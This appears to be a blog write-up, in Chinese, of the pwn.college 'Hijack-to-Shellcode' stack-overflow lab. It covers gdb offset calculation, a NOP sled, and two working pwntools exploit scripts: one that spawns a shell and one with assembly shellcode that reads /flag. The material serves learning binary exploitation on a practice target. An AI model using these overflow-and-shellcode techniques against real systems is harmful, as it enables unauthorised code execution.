<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hijach-to-Shellcode | 0x4A</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="题目简介基础的栈溢出，在&#x2F;challenge目录下仅存在一个ELF文件，无源代码，需要我们构造输入劫持返回地址，其实不难，但通过这道题完全理解了栈这个东西，并且熟悉了一个pwn题的基本思路，因此做一下记录（备注：题解中有些步骤在本题来说其实没必要，但尽可能记录面对一个pwn题的完整步骤，因此题解中会显得比较冗余）">
<meta property="og:type" content="article">
<meta property="og:title" content="Hijach-to-Shellcode">
<meta property="og:url" content="http://0x4a-210.github.io/2025/07/15/pwn.college-Wp/Intro-to-Cybersecurity/Pwn/Hijach-to-Shellcode/index.html">
<meta property="og:site_name" content="0x4A">
<meta property="og:description" content="题目简介基础的栈溢出，在&#x2F;challenge目录下仅存在一个ELF文件，无源代码，需要我们构造输入劫持返回地址，其实不难，但通过这道题完全理解了栈这个东西，并且熟悉了一个pwn题的基本思路，因此做一下记录（备注：题解中有些步骤在本题来说其实没必要，但尽可能记录面对一个pwn题的完整步骤，因此题解中会显得比较冗余）">
<meta property="og:locale">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/checksec.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/Find-Win.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/breakpoint.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp1.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp2.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp3.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/flag.png">
<meta property="article:published_time" content="2025-07-15T04:45:00.000Z">
<meta property="article:modified_time" content="2025-07-15T05:48:53.076Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://0x4a-210.github.io/photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/checksec.png">
  
    <link rel="alternate" href="/atom.xml" title="0x4A" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">0x4A</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Suche"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Suche"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://0x4A-210.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-pwn.college-Wp/Intro-to-Cybersecurity/Pwn/Hijach-to-Shellcode" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/07/15/pwn.college-Wp/Intro-to-Cybersecurity/Pwn/Hijach-to-Shellcode/" class="article-date">
  <time class="dt-published" datetime="2025-07-15T04:45:00.000Z" itemprop="datePublished">2025-07-15</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Hijach-to-Shellcode
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="题目简介"><a href="#题目简介" class="headerlink" title="题目简介"></a>题目简介</h1><p>基础的栈溢出，在&#x2F;challenge目录下仅存在一个ELF文件，无源代码，需要我们构造输入劫持返回地址，其实不难，但通过这道题完全理解了栈这个东西，并且熟悉了一个pwn题的基本思路，因此做一下记录<br><br>（备注：题解中有些步骤在本题来说其实没必要，但尽可能记录面对一个pwn题的完整步骤，因此题解中会显得比较冗余）</p>
<span id="more"></span>

<h1 id="漏洞点分析与利用"><a href="#漏洞点分析与利用" class="headerlink" title="漏洞点分析与利用"></a>漏洞点分析与利用</h1><h2 id="基础前置步骤"><a href="#基础前置步骤" class="headerlink" title="基础前置步骤"></a>基础前置步骤</h2><p>首先是用checksec看一下开了哪些保护<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/checksec.png"><br>发现保护全关，接下来确定是否有后门函数（一般是win），这决定着是自己写shellcode还是只需要覆写返回地址；（这一题里面没必要，因为既然题目都叫“劫持到shellcode”了）<br><br>反汇编看一下<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/Find-Win.png"><br>发现没有后门函数，因此需要自己编写shellcode；<br></p>
<h2 id="确定偏移量"><a href="#确定偏移量" class="headerlink" title="确定偏移量"></a>确定偏移量</h2><p>为了编写shellcode，首先需要确定输入缓冲区到返回地址的偏移，这里采用gdb打断点调试+手动计算的方法<br><br>（备注：pwn.college由于是打本地，没有root权限，因此没办法采用pwndbg插件+cyclic计算偏移的办法，正常的CTF是漏洞程序运行在远端服务器，在本地调试写好exp再去打远程，因此可以使用pwndbg更方便计算偏移）<br>首先反汇编challenge函数，在关键的函数前后以及ret指令之前打上断点，具体到这题就是read函数前后，因为溢出漏洞是read允许的输入范围过大导致可以覆写返回地址<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/breakpoint.png"><br>看到反汇编结果如上图所示，在challenge+177，challenge+182以及最后的challenge+253这三个地方打断点并启动程序</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b *challenge+177</span><br><span class="line">b *(challenge+182)</span><br><span class="line"><span class="built_in">break</span> *(challenge+253)</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>可以看到程序停在第一个断点处，即challenge+177，此时使用x&#x2F;命令查看一次$rsp寄存器的值，对应的就是输入前程序的栈帧布局<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp1.png"><br>之后让程序继续执行（通过在gdb的命令行输入c或continue实现），此时会要求我们输入，可以任意输入数据，但建议选择一些具有代表性的字符（比如’a’）以便后续辨认缓冲区的起点<br><br>此时程序会停在第2个断点，即challenge+182，我们再次使用x命令查看$rsp<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp2.png"><br>之后，最后运行一次continue命令，程序将停在ret指令之前，此时再次使用x命令查看$rsp，由于ret本质是进行pop rip操作，因此rsp此时指向的第一个内存格子就是返回地址<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/rsp3.png"><br>现在，通过返回地址的地址-缓冲区起始地址可以得到偏移量offset&#x3D;0x7fffffffd608-0x7fffffffd590&#x3D;0x78&#x3D;120<br></p>
<h2 id="确定返回地址"><a href="#确定返回地址" class="headerlink" title="确定返回地址"></a>确定返回地址</h2><p>接下来需要确定返回地址，即我们的shellcode的起始地址是哪，首先很自然想到将shellcode放在返回地址后面，因此应该将返回地址覆写为0x7fffffffd610<br><br>但是不能这么干，因为这样gdb调试得到的返回地址其实是不准确的，因为gdb会引入一些环境变量导致栈的空间改变，在实战中，更多采用NOP滑行的方法，即在真正的shellcode之前填入若干个NOP指令，返回地址只要确定一个大概范围，最后能命中这些NOP里的任何一个即可，这里我选择的是0x7fffffffd660，在返回地址后面0x50个字节。</p>
<h2 id="编写exp"><a href="#编写exp" class="headerlink" title="编写exp"></a>编写exp</h2><p>综合上述信息，编写得到exp.py如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">returnAddr=<span class="number">0x7fffffffd660</span></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;x86_64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&#x27;/challenge/binary-exploitation-hijack-to-shellcode&#x27;</span>)</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">payload=<span class="string">b&quot;1&quot;</span>*<span class="number">120</span>+p64(returnAddr)+<span class="string">b&#x27;\x90&#x27;</span>*<span class="number">0x200</span>+shellcode</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Send your payload (up to 4096 bytes)!\n&#x27;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recv()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="getshell的临门一脚"><a href="#getshell的临门一脚" class="headerlink" title="getshell的临门一脚"></a>getshell的临门一脚</h1><p>很遗憾，上述脚本实测无法打通，这是由于pwn.college的问题，子进程并没有继承root权限，导致读取&#x2F;flag文件时权限错误<br><br>有2种办法解决，一个是在调用&#x2F;bin&#x2F;sh之前进行一次setuid(0)的操作，另一种是改一下shellcode，直接通过系统调用完成输出flag，我这题采用了后者<br><br>最终exp.py如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">returnAddr=<span class="number">0x7fffffffd660</span></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;x86_64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&#x27;/challenge/binary-exploitation-hijack-to-shellcode&#x27;</span>)</span><br><span class="line">shellcode= asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">.intel_syntax noprefix</span></span><br><span class="line"><span class="string">mov r10,0x67616c662f2f2f2f</span></span><br><span class="line"><span class="string">shr r10,24</span></span><br><span class="line"><span class="string">push r10</span></span><br><span class="line"><span class="string">lea rdi,[rsp]</span></span><br><span class="line"><span class="string">xor rsi,rsi</span></span><br><span class="line"><span class="string">xor rax,rax</span></span><br><span class="line"><span class="string">push 2</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov rdi,rax</span></span><br><span class="line"><span class="string">sub rsp,100</span></span><br><span class="line"><span class="string">lea rsi,[rsp]</span></span><br><span class="line"><span class="string">xor rdx,rdx</span></span><br><span class="line"><span class="string">push 100</span></span><br><span class="line"><span class="string">pop rdx</span></span><br><span class="line"><span class="string">xor rax,rax</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">xor rdi,rdi</span></span><br><span class="line"><span class="string">push 1</span></span><br><span class="line"><span class="string">pop rdi</span></span><br><span class="line"><span class="string">lea rsi,[rsp]</span></span><br><span class="line"><span class="string">xor rax,rax</span></span><br><span class="line"><span class="string">push 1</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line">payload=<span class="string">b&quot;1&quot;</span>*<span class="number">120</span>+p64(returnAddr)+<span class="string">b&#x27;\x90&#x27;</span>*<span class="number">0x200</span>+shellcode</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Send your payload (up to 4096 bytes)!\n&#x27;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">output = p.recvall()</span><br><span class="line"><span class="built_in">print</span>(output.decode(errors=<span class="string">&#x27;ignore&#x27;</span>))</span><br></pre></td></tr></table></figure>
<p>最后也是成功拿到了flag<br><img src="/../../../../../../../photos/pwn.college/intro/Pwn/Hijack-to-Shellcode/flag.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://0x4a-210.github.io/2025/07/15/pwn.college-Wp/Intro-to-Cybersecurity/Pwn/Hijach-to-Shellcode/" data-id="cmd85obq20007rovf2fbb74bj" data-title="Hijach-to-Shellcode" class="article-share-link"><span class="fa fa-share">Teilen</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/07/17/pwn.college-Wp/Intro-to-Cybersecurity/Web/XSS-7/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Neuer</strong>
      <div class="article-nav-title">
        
          XSS-7
        
      </div>
    </a>
  
  
    <a href="/2025/07/15/pwn.college-Wp/Intro-to-Cybersecurity/Web/XSS-5/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Älter</strong>
      <div class="article-nav-title">XSS-5</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archiv</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/07/">July 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">letzter Beitrag</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/07/18/pwn.college-Wp/Intro-to-Cybersecurity/Web/CSRF-5/">CSRF-5</a>
          </li>
        
          <li>
            <a href="/2025/07/18/pwn.college-Wp/Intro-to-Cybersecurity/Web/CSRF-3/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/07/18/pwn.college-Wp/Intro-to-Cybersecurity/Web/CSRF-1/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/07/17/pwn.college-Wp/Intro-to-Cybersecurity/Web/SQLi-5/">SQLi-5</a>
          </li>
        
          <li>
            <a href="/2025/07/17/pwn.college-Wp/Intro-to-Cybersecurity/Web/XSS-7/">XSS-7</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 0x4A<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>